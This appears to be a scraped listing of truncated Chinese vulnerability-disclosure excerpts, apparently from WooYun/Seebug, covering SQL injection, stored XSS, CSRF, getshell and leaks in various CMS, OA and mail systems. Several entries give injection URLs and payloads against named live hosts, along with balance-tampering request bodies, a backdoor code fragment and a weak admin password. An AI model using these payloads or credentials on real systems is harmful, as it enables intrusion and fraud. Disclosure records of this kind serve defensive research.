ThinkSNS 防御绕过sql注射

简要描述： ThinkSNS 防御绕过注射 详细说明： public function doCommentD if $feedid = intval$POST'rowid' redirectU'w3g/Index/index', 3, '参数错误'; echo '参数错误'; exit; if empty$POST'content' // $this-redirectU'w3g/Index/detail',array'feedid'=$feedid, 3, '内容不能为空'; // return ; echo '内容不能为空'; exit; //原微博的内容 $map'commentid...

kesionV8.0升9.0工具中被修改过加入后门

简要描述： 要是用到V8.0升9.0工具就会被入侵 详细说明： 直接从官方下载来的 KesionCMS V8.0升9.0工具 。 漏洞证明： 代码inc/include.asp和index.asp最后面的代码 这代码可干的事很多吧。 " Response.End End If StrLogText=StrLogText& sender Set Lzwudi=Server.CreateObject"Scripting.FileSystemObject" Set Lenovo=Lzwudi.OpenTextFileServer.MapPath"."&""&StrLogFile,8,True,...

xdcms网上订餐系统 sql注入 #2

简要描述： rt 详细说明： 1 对于修改资料时，post的数组的key做了些过滤。 可是我们还是能 非法修改一些重要字段的。例如 http://demo.xdcms.cn/index.php?m=member&f=editsave post fields%5Bthumb%5D=1&fields%5Bmoney%5D=99999&fields%5Bsex%5D=%E7%94%B7&fields%5Bemail%5D=333333%40333.com&fields%5Baddress%5D=1&gourl= 无限充值了。 2 同样是post的数组的key的过滤问题。 少过滤了一处。 注册处...

53KF客服系统存在sql注入(官方测试)

简要描述： rt 详细说明： 53KF的客服系统存在sql注入 晚上你们服务器有waf 好不容易绕过了 早上发现却没有了 奇怪 www5.53kf.com/fenci/robotfenci.php?cmd=CR&comid=72000079&robotid=971b5d68cdd2d141e86978b8afa02f21&qid=1e278e4878dc8de61694c69482d20b6d&val=4 comid存在注入 Place: GET Parameter: comid Type: AND/OR time-based blind Title: MySQL 5.0.11 AND...

emlog EMalbum 3.1.1 /content/plugins/kl_album/kl_album_ajax_do.php 文件上传漏洞

No description provided by source...

Doyo 2.3 /pay.php SQL注入漏洞

No description provided by source...

TurboMail /mailmain 弱密码漏洞

No description provided by source. !/usr/bin/env python coding: utf-8 import re import random import threading from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class MyThreadthreading.Thread: def initself,func,args,name='':...

ThinkSAAS最新版漏洞打包

简要描述： SQL注入+文件包含+... 向xfkxfk牛学习，多个漏洞打包，希望走一个大厂商流程。 详细说明： 最新版中tsUrlCheck函数引发了多个漏洞 \thinksaas\tsFunction.php function tsUrlCheck$parameter $parameter = trim$parameter; //echo $parameter;exit; $arrStr = strsplit$parameter; $strOk = '%-1234567890abcdefghijklmnopqrstuvwxyz'; foreach $arrStr as $key =...

TurboMail /viewfile/account.xml 信息泄露漏洞

No description provided by source...

某OA办公系统储存型XSS#2

简要描述： 某OA办公系统储存型XSSdemo演示 详细说明： 漏洞证明： 官方站：http://www.oa8000.com/online.htm 官方演示站：http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa 普通用户登录，工作中心--任务管理--新建任务 在任务标题处写入XSS代码/" 查看我们发布的信息，直接查看任务即可，不用查看具体信息。...

eYou邮件系统邮件正文存储型XSS2(内附eYouXSS影响证明)

简要描述： 新玩意儿，影响Chrome。 在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏，导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。 详细说明： 新玩意儿，影响Chrome。 在测试这个XSS过程中发现一处很严重的HttpOnly COOKIE泄漏，导致邮件正文型XSS能够获取用户全部COOKIE从而进行登陆。内有POC （wooyun上有一些关于eyou邮件正文型XSS的报告，你们给的回应全都是“已有解决方案”、“问题已知，谢谢报告”。然而测试了几所大学的邮件系统，全都没修复，感觉你们是在逗我.....） 漏洞证明：...

欧朋浏览器之广告主后台敏感信息泄漏漏洞（泄漏内容证明）

简要描述： J2EE架构安全 详细说明： 泄漏点： http://59.151.113.225/WEB-INF/web.xml http://59.151.113.225/WEB-INF/spring/webmvc-config.xml 漏洞证明： Spring+Freemaker 反编译class文件...

yodo建站系统设计不当可刷钱（本地演示）

简要描述： 你可以看不惯我装逼，但不可以阻止我装逼 by:helen 详细说明： DOYO通用建站系统采用PHP与MYSQL开发,是免费开源的CMS建站、企业建站系统,可广泛用于个人、企业、政府、机构等众多网站建设 官网地址：wdoyo.com 官方提供demo但数据不可以入库：http://demo.wdoyo.com/ 所以只能本地演示了 本地搭建以后注册个会员，点击在线充值查看一下当前的余额（我这里之前刷的成了29.8） 接下来开始刷钱先来到首页随便选一个商品 选好最后点击立刻购买 然后burp抓包，把数量改成-1（-10，-100甚至-1000都可以） 之后查看价格已经变成了-5...

cmseasy 全站用户cookie枚举伪造登录

简要描述： cmseasy 全站用户cookie枚举伪造登录 详细说明： 此问题 比较棘手，原因出在openid上面 我们之前有分析过一个案例： WooYun: cmseasy 逻辑缺陷可升级普通用户为管理员shell还会难吗 这里不赘述了，怎样去修改这个openid呢 我们发送url: http://localhost:8080/cmseasy/uploads/index.php?case=user&act=respond&ologincode=alipaylogin&userid=2&realname=test&token=xxxx 此时session里面openid已经为2...

华天动力储存XSS10处打包（6处绕过长度限制），非self-xss（demo演示）

简要描述： 缺个移动硬盘存片子 详细说明： demo演示，涉及大量政府，医院，房产，电视台等网站：http://www.oa8000.com/solution.htm 首先还是来到官网，看到demo演示地址：http://demo.oa8000.com 然后先用官方提供的普通用户登录 存在XSS的地方在：客户管理----联系人管理----我的联系人----新建 img src="https://images.se...

53KF某处一个注入点

简要描述： 某处的一个注入 详细说明： 存在注入的地址: http://www10.53kf.com/zdydbgg2.php?styleid=106098168&companyid=72067196&dbggtype=2 sqlmap identified the following injection points with a total of 0 HTTPs requests: --- Place: GET Parameter: styleid Type: boolean-based blind Title: AND boolean-based blind - WHERE or...

金蝶商城xss盲打

简要描述： xss盲打 详细说明： 地址：http://mall.kingdee.com/cart.action 1.三处小的xss （鸡肋） .jpg" width="600" onerror="javascript:errimgthis;" 2.一处反射型的xss， 位于商城主页的搜索处（鸡肋） http://mall.kingdee.com/search.action?k=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E 3.后台盲打组织成员（较严重） 注册了两个帐号进行测试，用B账户申请加入A账户的组织中，盲打A账户！...

某OA办公系统储存型XSS#demo演示

简要描述： 详细说明： 某OA办公系统储存型XSSdemo演示 漏洞证明： 官方站：http://www.oa8000.com/online.htm 官方演示站：http://demo.oa8000.com/OAapp/WebObjects/OAapp.woa 普通用户登录--短消息功能-发送短消息 首先以文本样式写入XSS代码：/" 然后在转换为HTML样式 这里发送给了自...

DzzOffice 1.2.3 /dzz/market/index.php SQL注入漏洞

No description provided by source...

金蝶某系统弱口令可查看修改敏感信息

简要描述： 看到乌云上报了很多洞，我也去挖一个。 详细说明： 云服务管理平台：http://118.194.40.134:8080/index.php?m=Index&a=index http://118.194.40.135:8080/index.php?m=Index&a=index 弱口令： admin kingdee 可查看订单信息，管理序列号，可以查看服务器ip和连接状态，ssh账号信息各种密钥 img src="https://images.seebug.org/uploa...

Wordpress Download Manager 2.7.4 /wp-content/plugins/download-manager/wpdm-core.php code execution vulnerability

No description provided by source...

cmseasy 修复不当前台无限制select union注射(绕过webscan)

简要描述： cmseasy 修复不当前台无限制select union注射 详细说明： 下载最新版本： ballotact.php: function indexaction if front::post'submit' if !front::post'ballot' front::alertlang'Pleaseselectvote'; return false; if config::get'checkip' $time=cookie::get'vttime'; if time -$time recupdate$data,$where;...

KPPW系统—sql注入一枚一年了还没修复

简要描述： KPPW系统—sql注入一枚一年了还没修复 详细说明： http://demo.kppw.cn/index.php?do=tasklist&i=169&pd=2' http://demo.kppw.cn/index.php?do=tasklist&i=169&pd=2 AND SLEEP50 https://images.seebug.org/upload/201501/252040114ace751692fb8e458b0aacafd63a9cbc.png 本人本地安装测试 下载的最新版 漏洞证明：...

大汉网络无条件GetShell漏洞

简要描述： 大汉网络无条件GetShell漏洞 详细说明： 漏洞地址： /vc/vc/index/queindex.jsp 过程演示： 根据提示构造zip包 default.html 页面填写相应内容。 上传zip包，上传成功。 成功上传WebShell， 访问地址：http://www.njhdgcj.com/vc/vc/htmlhttps://images.seebug.org/upload/j.jsp 漏洞证明： 案例： 长江南京航道工程局 http://...

YXcms后台csrf添加管理员+getshell

简要描述： YXcms后台csrf添加管理员+getshell 详细说明： 没有任何验证，加上他又一个模版功能可建立php文件，导致getshell 漏洞证明： 1、后台添加管理然后用burp截断 我们发现没有验证，然后就构造表单 None 接下来用菜刀连接试试 连接成功...

eduwind 1.6.3 /protected/modules/cms/controllers/ArticleController.php SQL注入漏洞

No description provided by source...

PHPB2B注入#4(绕过过滤)

简要描述： 绕过全局sql注入过滤。 详细说明： function Add$primaryid, $formattributes, $formid=1, $typeid = 1 $datas = array; $inserts = null; $reurnattributeids = null; $formattributes = arrayfilter$formattributes; if !empty$formattributes && isarray$formattributes foreach $formattributes as $key=$val...

WordPress /wp-content/plugins/html5-mp3-player-with-playlist/html5plus/playlist.php 信息泄露漏洞

No description provided by source...

Wordpress多个主题任意文件下载漏洞

No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '1679' vul ID version = '1' author = 'zhengdt' vulDate = '2014-10-06' createDate ...

U-Mail邮件系统注入2(SQL Injections in MySQL LIMIT clause,无需登录，附获取用户密码脚本)

简要描述： SQL Injections in MySQL LIMIT clause，过滤不严，产生盲注，导致可以注射用户名与密码，无需登录 详细说明： 上次搜索只在client搜索，今天无意在fast目录下搜索了下，又发现了一处。 注：client的目录下的所有函数必须登录才可以执行，fast的目录无需登录可以执行部分存在的函数，但并不能查看邮件等等。 漏洞与上一个原理一样，但文件不同，此处访问权限设置不严格，可以任意用户访问，导致可以无需登录即可sql注入，limit无法使用sleep，用benchamark延时 漏洞文件/fast/oab/module/operates.php代码...

eduwind 1.6.3 /protected/modules/cms/controllers/PeopleController.php SQL注入漏洞

No description provided by source...

WordPress Platform Theme 1.4.3 /includes/library.options.php 本地文件包含漏洞

No description provided by source...

U-Mail邮件系统注入(SQL Injections in MySQL LIMIT clause案例)

简要描述： SQL Injections in MySQL LIMIT clause，恰巧该邮件系统这处存在缺陷，刚好来个案例展示，通过注入可以获取管理员密码 详细说明： 漏洞产生的原因，sql语句中的limit由用户可控，其处理不当因而导致了sql注入的产生 漏洞文件/client/oab/module/operates.php 代码为 if ACTION == "member-get" $deptid = gss $GET'deptid' ; $deptid = intval $deptid ;//此处不传入该变量 $keyword = gss $GET'keyword' ; $pa...

某政府信息公开系统存在SQL注入

简要描述： RT 详细说明： 吉大正元信息技术股份有限公司:http://www.jit.com.cn/ 众多政府网站都在使用该系统 我就用5个案例来测试。 注入链接是： zwdtSjgl/ysq/depInfoiframe.jsp?depid= 案例： http://www.jlfm.gov.cn:8081/zwdtSjgl/ysq/depInfoiframe.jsp?depid=013520945&depname=吉林市国土资源局丰满分局...

某政府系统通用SQL盲注#4（影响政府众多网站）

简要描述： RT 详细说明： 官网:http://www.jit.com.cn/ 案例如下： http://139.209.60.6//zwdtSjgl/ysq/depListDir.jsp?departmentid=013521374&departmentname=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD...

欧朋浏览器多站配置不当泄漏敏感信息

简要描述： J2EE架构安全 详细说明： 关于WEB-INF WEB-INF是Java的WEB应用的安全目录。所谓安全就是客户端无法访问，只有服务端可以访问的目录。 WEB-INF目录下的敏感目录及文件： classes目录（包含该应用核心的java类编译后的class文件及部分配置文件） lib目录（所用框架、插件或组件的架包） web.xml（重要的配置文件） 泄漏点1. http://59.151.113.213/WEB-INF/web.xml http://59.151.113.213/WEB-INF/spring/webmvc-config.xml...

某政府系统通用SQL盲注#1(影响大量政府)

简要描述： RT 详细说明： 官网:http://www.jit.com.cn/ http://218.27.140.5/zwdtSjgl/Directory/depListXX.jsp?departmentid=B02C579&departmentname=%CA%E6%C0%BC%CA%D0%C3%F1%D5%FE%BE%D6&departmentType=1...

cmseasy 管理端越权(删除 修改 添加 产品 和 订单) 不花钱你懂的

简要描述： cmseasy 管理端越权删除 修改 添加 产品 和 订单 不花钱你懂的 详细说明： 看代码: manageact.php: function init $user=''; $guest = front::get'guest'; if$guest=='1'&&config::get'opguestadd' $user = 'Guest'; else ifcookie::get'loginusername' &&cookie::get'loginpassword' $user=new user;...

释锐教育校校用平台通用远程命令执行

简要描述： 释锐教育校校用平台通用远程命令执行，可批量getshell. 详细说明： 一、 上海释锐网络信息服务有限公司成立于2002年，是一家注册并入住张江高科技园区的教育软件企业。 释锐™致力于传播教育先进力量，为教育行业用户提供从校校用™软件及服务、910SPACE.COM教育社区网站运营到教育论坛与咨询服务等全方位的教育信息化应用解决方案，通过教育信带动推动教育现代化。 荣誉与市场地位： 1.“释锐®校校用™平台”2004荣获“上海市中小学教育信息化应用示范项目”。 2.“释锐®校校用™平台”2008荣获“上海市张江高科技园区科技创新专项资金政府资助项目”。...

Iwebshop最新版注入又一枚

简要描述： Iwebshop最新版注入又一枚 详细说明： 看到wooyun上有人提了几个iweshop（2014-11-18更新）的漏洞（ WooYun: iWebShop开源电子商务系统SQL注入漏洞 ），去官网看了看，在2014-12-16 已更新到了 iwebshop2.9.14121000，下下来研究研究，希望不要重复。 注入一枚：POST /index.php?controller=seller&action=orderlist POST参数中的search作为一个数组传入，search的KEY and VALUE...

cmseasy sql二次注入漏洞

简要描述： cmseasy 可shell的漏洞 详细说明： 下载最新的cmseasy，发现有一处问题 用户注册处，email没有做任何限制，可以任意填写 我们发送url: POST /cmseasylast/uploads/index.php?case=user&act=register HTTP/1.1 Host: localhost postdata: username=sql1231&password=111111&password2=111111&question=&answer=ccccc&email=',data='openid|s:1:"2";' WHERE clienti...

蝉知企业门户系统 v3.3csrf修改管理员密码

简要描述： 蝉知企业门户系统 v3.3csrf修改管理员密码 详细说明： 蝉知企业门户系统 v3.3最新版本 存在csrf漏洞 而且我测试的时候发现，即使修改了密码，管理员也不会马上需要重新登陆，所以配合我的回旋镖，可以达到神不知鬼不觉的修改其管理密码 接下来，我就来详细的演示漏洞过程 漏洞证明： 1、我们进入后台，发现没有添加管理员，那么我们来尝试一下修改管理员密码 很有意思，我们发现修改管理员的密码，不需要验证原密码好危险撒！ 那我们再来抓包截断看看有没有token之类的验证 2、用burpsuite截断 我的小伙伴们都惊呆了 有木有？？ 没有验证，就两个password...

xdcms网上订餐系统 sql注入

简要描述： rt 详细说明： 老问题了，订餐系统与企业管理系统 有着相似的地方。。于是就找到了一处注入。 官网演示。 注册用户后，修改资料。 改包 ，字段处加个 fields%5Btitle%5D=a&fields%5Btruename%5D=a&fields%5Btelephone%5D=a&fields%5Baddress%5D=a&fields%5Bcontent%5D=a&verifycode=1adf&submit=+%E6%8F%90+%E4%BA%A4+ 发现 报错了...

74CMS 3.5.1 /wap/wap-resume-show.php SQL注入漏洞

/wap/wap-resume-show.phpifintval$SESSION"uid"0 $sql="select from ".table"companydownresume"." where companyuid=$SESSIONuid and resumeid=$GETid "; $downresume=$db-getone$sql; $smarty-assign'downresume',$downresume; $time=time; $jobssql="select from ".table"jobs"." where uid=$SESSIONuid and display...

74CMS 3.4 /plus/weixin.php 任意文件下载漏洞

No description provided by source...

phpMyRecipes 1.2.2 /dosearch.php SQL注入漏洞

No description provided by source...

某资料管理系统SQL注入

简要描述： RT 详细说明： 杭州麦达电子有限公司官网:http://www.metadata.com.cn/ 两处参数都可以注入。。 http://58.155.179.40:8088/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.206.242.26:88/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://58.155.179.40:8088/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37...

PHPB2B三处sql注入

简要描述： 三处sql注射打包 详细说明： \virtual-office\offer.php: if isset$POST'del' && !empty$POST'tradeid' $tRes = $trade-del$POST'tradeid', "memberid = ".$thememberid; if$tRes $pdb-Execute"DELETE from $tbprefixtradefields WHERE memberid=$thememberid AND tradeid IN...

Iwebshop最新版注入又一枚

简要描述： Iwebshop最新版注入又一枚 详细说明： 看到wooyun上有人提了几个iweshop（2014-11-18更新）的漏洞（ WooYun: iWebShop开源电子商务系统SQL注入漏洞 ），去官网看了看，在2014-12-16 已更新到了 iwebshop2.9.14121000，下下来研究研究，希望不要重复。 注入一枚：POST /index.php?controller=seller&action=goodslist这个注入藏的相对比较深，在HTML文件中。POST参数中的search作为一个数组传入，search的KEY and VALUE...

Joomla Adminexile 2.3.5 /administrator SQL注入漏洞

No description provided by source...